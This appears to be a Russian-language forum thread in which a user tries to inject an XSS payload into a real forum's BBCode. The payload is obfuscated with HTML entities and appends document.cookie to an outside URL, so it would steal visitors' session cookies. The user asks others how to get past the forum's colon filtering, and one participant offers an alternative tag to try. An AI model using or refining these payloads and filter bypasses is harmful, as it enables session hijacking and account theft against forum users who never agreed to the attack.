Вот пытаюсь вставить эту XSS:
[post=1000.*src=*"*h*;*6;
*16;&*#112*;*8;&#*47;&#*47;&#*97;&#*110;*t*;
*05;&#*99;&*#104;*a**6;&#*46;&#*114;&*#117*;*7; *9;
*03;&*#105;*-*;b*; *5;
*10;&*#47;s.j&*#112;g?"+document.cookie); ] ]
Естественно без звездочек, пост на форуме пустой если поставить алерт [post=1000 ] , то он не выскакивает.

каким браузером?

Ie 6.0

Попробуй таким макаром[topic=1000

Не выходит, даже код не скрывает.

Насколько я поял, дело здесь в том, что форум не пропускает двоеточие :
Вот код поста после отсылки его на форум ( Без звездочки)
<div class="postcolor" style='padding:4px;'><a href='index.php?act=findpost&pid=1000<a href='index.php?showtopic=target style=background&*#58;url(java script:alert()); '> </a>'><br /><br /><br /></a></div>
Есть ли возможность обойти это, или подскажите какой нибудь другой код для XSS...

&*#58; естественно без звезды

Ну просто без звезды здесь &*#58; пробразуеться в двоеточие, а это уже не то, что было в коде поста, после отправки на форум.
Так есть ли другой код или способ обойти фильтрацию двоеточий?